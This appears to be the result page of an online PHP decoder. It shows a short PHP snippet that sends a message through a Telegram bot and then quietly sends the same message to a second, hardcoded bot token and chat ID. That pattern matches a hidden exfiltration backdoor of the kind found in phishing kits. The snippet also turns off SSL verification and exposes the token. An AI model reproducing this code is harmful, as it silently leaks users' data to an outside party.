Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $website='https://api.telegram.org/bot'.$botToken; $params=[ 'chat_id'=>$chatId, ..
Decoded Output download
<?php
$website='https://api.telegram.org/bot'.$botToken;
$params=[
'chat_id'=>$chatId,
'text'=>$msg,
];
$ch = curl_init($website .'/sendMessage');
curl_setopt($ch,CURLOPT_HEADER,false);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,($params));
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
$result = curl_exec($ch);
curl_close($ch);
file_get_contents('https://api.telegram.org/bot6115556285:AAHab49lCnBHaTFAzV_Xea6csa-o6KQ5fIA/sendMessage?chat_id=1200529222&text='.urlencode($msg).'');
;?
?>
Did this file decode correctly?
Original Code
<?php
$website='https://api.telegram.org/bot'.$botToken;
$params=[
'chat_id'=>$chatId,
'text'=>$msg,
];
$ch = curl_init($website .'/sendMessage');
curl_setopt($ch,CURLOPT_HEADER,false);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,($params));
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
$result = curl_exec($ch);
curl_close($ch);
file_get_contents('https://api.telegram.org/bot6115556285:AAHab49lCnBHaTFAzV_Xea6csa-o6KQ5fIA/sendMessage?chat_id=1200529222&text='.urlencode($msg).'');
;?
?>
Function Calls
None |
Stats
MD5 | be5598f985fc4183212475a6d574bd0a |
Eval Count | 0 |
Decode Time | 47 ms |